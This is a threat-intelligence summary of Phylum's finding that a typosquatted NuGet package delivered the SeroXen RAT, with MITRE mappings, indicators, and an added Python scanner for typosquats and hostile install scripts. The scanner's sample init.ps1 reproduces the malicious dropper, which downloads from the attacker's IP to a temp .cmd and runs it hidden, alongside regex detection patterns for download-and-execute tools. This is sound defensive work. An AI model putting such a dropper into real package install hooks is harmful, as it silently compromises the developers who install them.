Phylum Discovers SeroXen RAT in Typosquatted NuGet Package

Phylum detected a typosquatted NuGet package that delivered the SeroXen RAT, demonstrating how open-source ecosystems can be abused. The post details the typosquatted package, its obfuscated payload chain (PowerShell, batch scripts, DLLs), and download-count anomalies, underscoring the risk to developers and ecosystems. #SeroXen #NuGet #IGBOAT #Disti #Pathoschild.Stardew.Mod.Build.Config #Pathoschild.Stardew.ModBuildConfig

Keypoints

  • The malicious NuGet package Pathoschild.Stardew.Mod.Build.Config is a typosquat of the legitimate Pathoschild.Stardew.ModBuildConfig.
  • The malicious package includes both tools/init.ps1 and tools/install.ps1, and also a tools/uninstall.ps1, indicating full lifecycle coverage for the payload.
  • The init.ps1 script downloads a remote payload from a hardcoded URL and silently executes it, enabling covert installation.
  • The downloaded payload is a highly obfuscated batch file that decrypts and decompresses two DLLs, then loads and executes them via PowerShell, delivering SeroXen RAT.
  • The deobfuscated components eventually lead to payload.exe, which is identified as CSStub2 and ties back to SeroXen’s capabilities and obfuscation techniques.
  • The article highlights abuse of NuGet and download-count inflation as part of the campaign and notes SeroXen’s broader threat profile (encryption, anti-analysis, fileless traits).

MITRE Techniques

  • [T1195] Supply Chain Compromise – The package is a typosquat of a legitimate package – “The package is a typosquat of a legitimate package called Pathoschild.Stardew.ModBuildConfig.”
  • [T1059.001] PowerShell – The attack uses a PowerShell script to decrypt, decompress, and execute payloads within the same process. “Ultimately though, this script finds the first line in the batch script which begins with “SEROXEN” and subsequently decrypts and decompresses two DLLs from base64 encoded strings on that line before executing them in the same PowerShell process.”
  • [T1027] Obfuscated/Compressed Files and Information – The batch file is highly obfuscated and uses techniques to hide its true strings and commands. “This file uses several obfuscation techniques to make it look like a mess: It uses undefined variables to take up space…”
  • [T1105] Ingress Tool Transfer – The init.ps1 script downloads a remote payload via Invoke-WebRequest and saves it locally. “Invoke-WebRequest -Uri $a -OutFile $y -ErrorAction SilentlyContinue | Out-Null”
  • [T1140] Deobfuscate/Decode Files or Information – The process decrypts and decompresses embedded payloads from base64, reconstructing DLLs before execution. “decrypts and decompresses two DLLs from base64 encoded strings on that line before executing them…”
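The keypoints and the techniques above describe two things a defender can check statically before a package's install hooks ever run: whether a package ID is a separator-only variant of a known legitimate ID, and whether its tools/init.ps1, install.ps1 or uninstall.ps1 contains a download-to-disk-and-execute chain. The script below is an added example written for this summary; it is not Phylum's tooling or anything from the original post. The function names (typosquat_score, triage_nupkg, build_sample_nupkg), the regex rules and the 0.9 similarity threshold are my own choices, and the .nupkg it inspects is constructed in memory: its init.ps1 reuses the Invoke-WebRequest line and the URL quoted on this page purely as strings to match against, and nothing is fetched.

```python
"""Static triage of a NuGet package: typosquat distance plus install-script scan.

Added example, not Phylum's code. Function names and thresholds are assumptions.
"""
import difflib
import io
import re
import zipfile

# Package IDs taken from the page.
LEGIT = "Pathoschild.Stardew.ModBuildConfig"
SUSPECT = "Pathoschild.Stardew.Mod.Build.Config"


def normalize(package_id: str) -> str:
    """NuGet IDs are case-insensitive; strip separators so Mod.Build.Config == ModBuildConfig."""
    return re.sub(r"[.\-_]", "", package_id).lower()


def typosquat_score(candidate: str, known: str) -> float:
    """Similarity of normalized IDs, 1.0 meaning identical once separators and case are removed."""
    return difflib.SequenceMatcher(None, normalize(candidate), normalize(known)).ratio()


def is_typosquat(candidate: str, known: str, threshold: float = 0.9) -> bool:
    """A different ID that normalizes to (almost) the same string is a typosquat candidate."""
    return candidate.lower() != known.lower() and typosquat_score(candidate, known) >= threshold


# Download-and-execute indicators in PowerShell install hooks (assumed rule set).
PATTERNS = {
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/", re.I),
    "web_download": re.compile(r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|DownloadFile|\biwr\b", re.I),
    "outfile_to_disk": re.compile(r"-OutFile", re.I),
    "error_suppression": re.compile(r"-ErrorAction\s+SilentlyContinue", re.I),
    "hidden_execution": re.compile(r"-WindowStyle\s+Hidden|Start-Process|cmd(?:\.exe)?\s*/c|\bIEX\b|Invoke-Expression", re.I),
}

# Lifecycle hooks NuGet ran automatically for classic packages.
LIFECYCLE_SCRIPTS = ("tools/init.ps1", "tools/install.ps1", "tools/uninstall.ps1")


def scan_script(text: str) -> set:
    """Return the names of every rule that matches the script body."""
    return {name for name, rx in PATTERNS.items() if rx.search(text)}


def triage_nupkg(data: bytes) -> dict:
    """Open a .nupkg (a zip archive) and report rule hits per lifecycle script.

    The package is flagged when a script both downloads and writes to disk,
    or when it references a bare-IP URL.
    """
    report = {"scripts": {}, "flagged": False}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for member in z.namelist():
            if member.lower() in LIFECYCLE_SCRIPTS:
                text = z.read(member).decode("utf-8", errors="replace")
                hits = scan_script(text)
                report["scripts"][member] = sorted(hits)
                if {"web_download", "outfile_to_disk"} <= hits or "raw_ip_url" in hits:
                    report["flagged"] = True
    return report


def build_sample_nupkg() -> bytes:
    """Constructed sample package for the scanner; not the real package's contents."""
    init_ps1 = "\n".join([
        "param($installPath, $toolsPath, $package, $project)",
        "$a = 'http://66.23.238.220/assets/images/icons/svg/x.bin'",  # URL string from the page's IoCs
        "$y = Join-Path $env:TEMP 'tempxxxxx.cmd'",
        "Invoke-WebRequest -Uri $a -OutFile $y -ErrorAction SilentlyContinue | Out-Null",  # line quoted on the page
        "Start-Process -FilePath $y -WindowStyle Hidden",
    ])
    benign_install = "param($installPath, $toolsPath, $package, $project)\nWrite-Host 'configuring build'"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("tools/init.ps1", init_ps1)
        z.writestr("tools/install.ps1", benign_install)
        z.writestr("lib/net45/placeholder.txt", "")
    return buf.getvalue()


if __name__ == "__main__":
    print(f"{SUSPECT!r} vs {LEGIT!r}: score={typosquat_score(SUSPECT, LEGIT):.2f} "
          f"typosquat={is_typosquat(SUSPECT, LEGIT)}")
    for script, hits in triage_nupkg(build_sample_nupkg())["scripts"].items():
        print(f"{script}: {hits or 'no findings'}")
```

Run against a real .nupkg by passing open(path, "rb").read() to triage_nupkg; the typosquat check is meant to be run over the full list of package IDs your builds depend on, comparing each new or unfamiliar ID against the ones you already trust. The separator-stripping normalization is deliberately narrow so it catches the exact pattern in this campaign (Mod.Build.Config versus ModBuildConfig) without flooding you with near-miss noise.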

Indicators of Compromise

  • [IP] 66.23.238.220 – Address hosting the remote URL from which init.ps1 fetches the payload – “http://66.23.238.220/assets/images/icons/svg/x.bin”
  • [File] x.bin – Name of the payload file at the remote URL
  • [File] tempxxxxx.cmd – Local path to which the downloaded payload is saved before it is executed
  • [File] payload.exe – Extracted executable identified as CSStub2
  • [Package] Pathoschild.Stardew.Mod.Build.Config – Malicious NuGet package published by Disti
  • [Package] Pathoschild.Stardew.ModBuildConfig – Legitimate package that the malicious one typosquatted
  • [Publisher] Disti – NuGet publisher associated with the malicious package

Read more: https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/